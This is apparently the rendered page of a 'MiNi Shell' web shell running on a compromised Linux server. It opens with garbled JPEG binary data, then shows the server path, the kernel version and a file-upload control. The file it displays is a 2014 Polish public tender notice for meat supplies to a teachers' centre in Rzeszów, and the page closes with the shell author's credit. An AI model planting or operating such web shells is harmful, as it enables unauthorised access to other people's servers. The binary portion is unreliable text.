JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140220/34391-N-2014.html

<p class="kh_header"><b>Rzeszów: Sukcesywna dostawa mięsa i wyrobów z mięsa dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie wraz z Oddziałami - Nr AG-3211/6/14</b><br>
<b>Numer ogłoszenia: 34391 - 2014; data zamieszczenia: 20.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie , ul. Niedzielskiego 2, 35-036 Rzeszów, woj. podkarpackie, tel. 17 8534097, faks 17 8534682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa mięsa i wyrobów z mięsa dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie wraz z Oddziałami - Nr AG-3211/6/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa mięsa i wyrobów z mięsa dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie wraz z Oddziałami, w tym na potrzeby realizacji projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim; Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia.
Przedmiot zamówienia został podzielony na następujące części: Część I Sukcesywna dostawa mięsa i wyrobów z mięsa do lokalizacji PCEN  w Rzeszowie OENiPAS w Czudcu tj. Antrykot - mięso kg 25, Baleron - wędlina kg 23, Boczek gotowany - wędlina kg 3, Boczek wędzony - wędlina kg 100, Ćwiartka z kurczaka - mięso kg 125, Filet drobiowy - mięso kg 275, Filet wędzony z indyka - wędlina kg 30, Filet z indyka surowy - mięso kg 25, Flaki wołowe po wstępnej obróbce kg 10, Golonka z kością - mięso kg 5, Kabanosy wieprzowe - wędlina kg 5, Karkówka b/k - mięso kg 75, Kaszanka gryczana w jelicie naturalnym kg 10, Kęski piwne - wyrób gotowy kg 5, Kiełbasa typu grillowa kg 10, Kiełbasa typu kminkowa kg 5, Kiełbasa typu krakowska parzona kg 12, Kiełbasa typu krakowska sucha kg 35, Kiełbasa typu półsucha kg 5, Kiełbasa typu szynkowa  kg 25, Kiełbasa typu wiejska kg 20, Kiełbasa typu zwyczajna kg 80, Kości kulinarne od schabu kg 100, Kura rosołowa świeża kg 45, Kurczak świeży kg 20, Łopatka wieprzowa b/k - mięso kg 200, Mięso mielone wieprzowe kg 30, Parówka cienka delikatesowa kg 80, Pasztet pieczony wieprzowy kg 35, Polędwiczka surowa wieprzowa - mięso  kg 25, Rapetki wieprzowe kg 5, Schab b/k - mięso kg 350, Słonina bez skóry kg 20, Szynka typu karczek tradycyjny - wędlina kg 10, Szynka typu konserwowa - wędlina kg 60, Szynka typu myśliwska - wędlina kg 5, Szynka typu staropolska - wędlina kg 10, Szynka typu wiśniowa - wędlina kg 30, Szynka typu z liściem - wędlina kg 20, Szynka w siatce - wędlina kg 20, Szynka wieprzowa extra - mięso kg 75, Szynka wieprzowa typu pieczona - wędlina kg 5, Szynka wieprzowa wiązana - wędlina kg 5, Udko z kurczaka świeże kg 200, Wątróbki drobiowe świeże kg 80, Żeberka wieprzowe (paski) - mięso kg 25, 
Część II Sukcesywna dostawa mięsa i wyrobów z mięsa do lokalizacji PCEN w Rzeszowie Oddział w Przemyślu tj. Antrykot - mięso kg 15, Baleron - wędlina kg 20, Biodrówka wieprzowa - mięso kg 15, Boczek gotowany - wędlina kg 10, Boczek wędzony - wędlina kg 10, Dramstiki z kurczaka - mięso kg 25, Filet drobiowy - mięso kg 150, Filet drobiowy wędzony z indyka - wędlina kg 15, Flaki krojone gotowane wieprzowe kg 20, Golonka bez kości zapiekana kg 10, Golonka z kością - mięso kg 5, Kabanosy wieprzowe - wędlina kg 15, Karkówka b/k - mięso kg 150, Kiełbasa typu krakowska parzona kg 10, Kiełbasa typu krakowska podsuszana kg 20, Kiełbasa typu krakowska sucha kg 10, Kiełbasa typu półsucha kg 10, Kiełbasa typu szynkowa  kg 10, Kiełbasa typu wiejska  kg 10, Kiełbasa typu zwyczajna kg 40, Kości kulinarne drobiowe kg 30, Kura rosołowa świeża kg 30, Łopatka wieprzowa b/k - mięso kg 75, Mięso mielone wieprzowe kg 75, Parówka cienka delikatesowa kg 20, Parówka gruba  kg 40, Pasztet pieczony wieprzowy  kg  40, Podudzie drobiowe - mięso kg 20, Polędwica typu miodowa drobiowa - wędlina kg 15, Polędwica typu sopocka drobiowa - wędlina kg 15, Polędwica typu sopocka wieprzowa - wędlina kg 80, Rostbef - mięso  kg 10, Schab b/k - mięso kg 150, Schab faszerowany - wędlina kg 25, Schab pieczony - wędlina kg 10, Skrzydełko z kurczaka - mięso kg 15, Szponder - mięso kg 10, Szynka typu chłopska - wędlina ,kg 20, Szynka typu goleniowa - wędlina kg 10, Szynka typu konserwowa - wędlina kg 5, Szynka typu staropolska - wędlina kg 75, Szynka typu starowiejska -wędlina kg 10, Szynka typu swojska - wędlina kg 10, Szynka typu wiśniowa - wędlina kg 20, Szynka typu z liściem - wędlina kg 10, Szynka w siatce - wędlina kg 10, Szynka wiązana - wędlina kg 10, Szynka wieprzowa extra blok - wędlina kg 10, Szynka z piersi indyka w siatce - wędlina kg 15, Udko z kurczaka świeże kg 250, Żeberka wieprzowe (paski) - mięso kg 30,
Część III Sukcesywna dostawa mięsa i wyrobów z mięsa do lokalizacji PCEN w Rzeszowie Oddział w Tarnobrzegu tj. Antrykot - mięso kg 5, Boczek wędzony - wędlina kg 30, Filet drobiowy - mięso kg 150, Filet z indyka surowy - mięso kg 5, Flaki wołowe po wstępnej obróbce kg 5, Kabanosy wieprzowe - wędlina kg 4, Karkówka b/k - mięso kg 150, Kaszanka gryczana w jelicie naturalnym kg 2,5, Kiełbasa typu krakowska półsucha kg 15, Kiełbasa typu zwyczajna kg 40, Kiełbasa typu żywiecka sucha  kg 7,5, Kości kulinarne od schabu kg 50, Kura rosołowa świeża kg 50, Ligawa wołowa - mięso kg 6, Łopatka wieprzowa b/k - mięso kg 10, Parówka cienka delikatesowa kg 40, Podgardle wędzone  kg 5, Polędwica typu sopocka - wędlina kg 45, Polędwiczka surowa wieprzowa - mięso  kg 15, Schab b/k - mięso kg 150, Słonina bez skóry kg 5, Szynka typu wiśniowa - wędlina kg 20, Szynka w siatce - wędlina kg 25, Szynka wieprzowa extra - mięso kg 5, Udko z kurczaka świeże  kg 75, Wątróbki drobiowe świeże kg 1,5..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.10.00-9, 15.11.30.00-3, 15.11.20.00-6, 15.13.11.00-6, 15.13.12.00-7, 15.13.13.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest złożyć: a. Wypełniony druk Oferta - załącznik nr 2 do SIWZ wraz z formularzem cenowym/formularzami cenowymi odpowiednimi dla części zamówienia, na którą składana jest oferta - odpowiednie załączniki nr 1a - 1c do SIWZ. Dla uznania ważności, oferta musi zawierać także wszystkie wymagane w niniejszym rozdziale SIWZ oświadczenia i dokumenty. b. Pełnomocnictwo do reprezentowania Wykonawcy (w przypadku gdy nie wynika ono z załączonych dokumentów) - np. według załącznika nr 5 do SIWZ - jeżeli dotyczy. c. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w zakresie: a. zmiany wynagrodzenia Wykonawcy za wykonanie zamówienia, w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług, b. zmiany terminu wykonania zamówienia w przypadku wystąpienia: - siły wyższej. Siła wyższa - oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu, - innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z zawartą umową</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-14-tys.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, ul. Niedzielskiego 2, 35-036 Rzeszów, pokój nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2014 godzina 10:00, miejsce: Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, ul. Niedzielskiego 2, 35-036 Rzeszów, pokój nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest udzielane dla potrzeb Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie wraz z Oddziałami, w tym na potrzeby realizacji projektów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: - Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim, - Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa mięsa i wyrobów z mięsa do lokalizacji PCEN w Rzeszowie OENiPAS w Czudcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot - mięso kg 25, Baleron - wędlina kg 23, Boczek gotowany - wędlina kg 3, Boczek wędzony - wędlina kg 100, Ćwiartka z kurczaka - mięso kg 125, Filet drobiowy - mięso kg 275, Filet wędzony z indyka - wędlina kg 30, Filet z indyka surowy - mięso kg 25, Flaki wołowe po wstępnej obróbce kg 10, Golonka z kością - mięso kg 5, Kabanosy wieprzowe - wędlina kg 5, Karkówka b/k - mięso kg 75, Kaszanka gryczana w jelicie naturalnym kg 10, Kęski piwne - wyrób gotowy kg 5, Kiełbasa typu grillowa kg 10, Kiełbasa typu kminkowa kg 5, Kiełbasa typu krakowska parzona kg 12, Kiełbasa typu krakowska sucha kg 35, Kiełbasa typu półsucha kg 5, Kiełbasa typu szynkowa  kg 25, Kiełbasa typu wiejska kg 20, Kiełbasa typu zwyczajna kg 80, Kości kulinarne od schabu kg 100, Kura rosołowa świeża kg 45, Kurczak świeży kg 20, Łopatka wieprzowa b/k - mięso kg 200, Mięso mielone wieprzowe kg 30, Parówka cienka delikatesowa kg 80, Pasztet pieczony wieprzowy kg 35, Polędwiczka surowa wieprzowa - mięso  kg 25, Rapetki wieprzowe kg 5, Schab b/k - mięso kg 350, Słonina bez skóry kg 20, Szynka typu karczek tradycyjny - wędlina kg 10, Szynka typu konserwowa - wędlina kg 60, Szynka typu myśliwska - wędlina kg 5, Szynka typu staropolska - wędlina kg 10, Szynka typu wiśniowa - wędlina kg 30, Szynka typu z liściem - wędlina kg 20, Szynka w siatce - wędlina kg 20, Szynka wieprzowa extra - mięso kg 75, Szynka wieprzowa typu pieczona - wędlina kg 5, Szynka wieprzowa wiązana - wędlina kg 5, Udko z kurczaka świeże kg 200, Wątróbki drobiowe świeże kg 80, Żeberka wieprzowe (paski) - mięso kg 25,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.10.00-9, 15.11.30.00-3, 15.11.20.00-6, 15.13.11.00-6, 15.13.12.00-7, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa mięsa i wyrobów z mięsa do lokalizacji PCEN w Rzeszowie Oddział w Przemyślu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot - mięso kg 15, Baleron - wędlina kg 20, Biodrówka wieprzowa - mięso kg 15, Boczek gotowany - wędlina kg 10, Boczek wędzony - wędlina kg 10, Dramstiki z kurczaka - mięso kg 25, Filet drobiowy - mięso kg 150, Filet drobiowy wędzony z indyka - wędlina kg 15, Flaki krojone gotowane wieprzowe kg 20, Golonka bez kości zapiekana kg 10, Golonka z kością - mięso kg 5, Kabanosy wieprzowe - wędlina kg 15, Karkówka b/k - mięso kg 150, Kiełbasa typu krakowska parzona kg 10, Kiełbasa typu krakowska podsuszana kg 20, Kiełbasa typu krakowska sucha kg 10, Kiełbasa typu półsucha kg 10, Kiełbasa typu szynkowa  kg 10, Kiełbasa typu wiejska  kg 10, Kiełbasa typu zwyczajna kg 40, Kości kulinarne drobiowe kg 30, Kura rosołowa świeża kg 30, Łopatka wieprzowa b/k - mięso kg 75, Mięso mielone wieprzowe kg 75, Parówka cienka delikatesowa kg 20, Parówka gruba  kg 40, Pasztet pieczony wieprzowy  kg  40, Podudzie drobiowe - mięso kg 20, Polędwica typu miodowa drobiowa - wędlina kg 15, Polędwica typu sopocka drobiowa - wędlina kg 15, Polędwica typu sopocka wieprzowa - wędlina kg 80, Rostbef - mięso  kg 10, Schab b/k - mięso kg 150, Schab faszerowany - wędlina kg 25, Schab pieczony - wędlina kg 10, Skrzydełko z kurczaka - mięso kg 15, Szponder - mięso kg 10, Szynka typu chłopska - wędlina ,kg 20, Szynka typu goleniowa - wędlina kg 10, Szynka typu konserwowa - wędlina kg 5, Szynka typu staropolska - wędlina kg 75, Szynka typu starowiejska -wędlina kg 10, Szynka typu swojska - wędlina kg 10, Szynka typu wiśniowa - wędlina kg 20, Szynka typu z liściem - wędlina kg 10, Szynka w siatce - wędlina kg 10, Szynka wiązana - wędlina kg 10, Szynka wieprzowa extra blok - wędlina kg 10, Szynka z piersi indyka w siatce - wędlina kg 15, Udko z kurczaka świeże kg 250, Żeberka wieprzowe (paski) - mięso kg 30,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.10.00-9, 15.11.30.00-3, 15.11.20.00-6, 15.13.11.00-6, 15.13.12.00-7, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywna dostawa mięsa i wyrobów z mięsa do lokalizacji PCEN w Rzeszowie Oddział w Tarnobrzegu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot - mięso kg 5, Boczek wędzony - wędlina kg 30, Filet drobiowy - mięso kg 150, Filet z indyka surowy - mięso kg 5, Flaki wołowe po wstępnej obróbce kg 5, Kabanosy wieprzowe - wędlina kg 4, Karkówka b/k - mięso kg 150, Kaszanka gryczana w jelicie naturalnym kg 2,5, Kiełbasa typu krakowska półsucha kg 15, Kiełbasa typu zwyczajna kg 40, Kiełbasa typu żywiecka sucha  kg 7,5, Kości kulinarne od schabu kg 50, Kura rosołowa świeża kg 50, Ligawa wołowa - mięso kg 6, Łopatka wieprzowa b/k - mięso kg 10, Parówka cienka delikatesowa kg 40, Podgardle wędzone  kg 5, Polędwica typu sopocka - wędlina kg 45, Polędwiczka surowa wieprzowa - mięso  kg 15, Schab b/k - mięso kg 150, Słonina bez skóry kg 5, Szynka typu wiśniowa - wędlina kg 20, Szynka w siatce - wędlina kg 25, Szynka wieprzowa extra - mięso kg 5, Udko z kurczaka świeże  kg 75, Wątróbki drobiowe świeże kg 1,5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.10.00-9, 15.11.30.00-3, 15.11.20.00-6, 15.13.11.00-6, 15.13.12.00-7, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com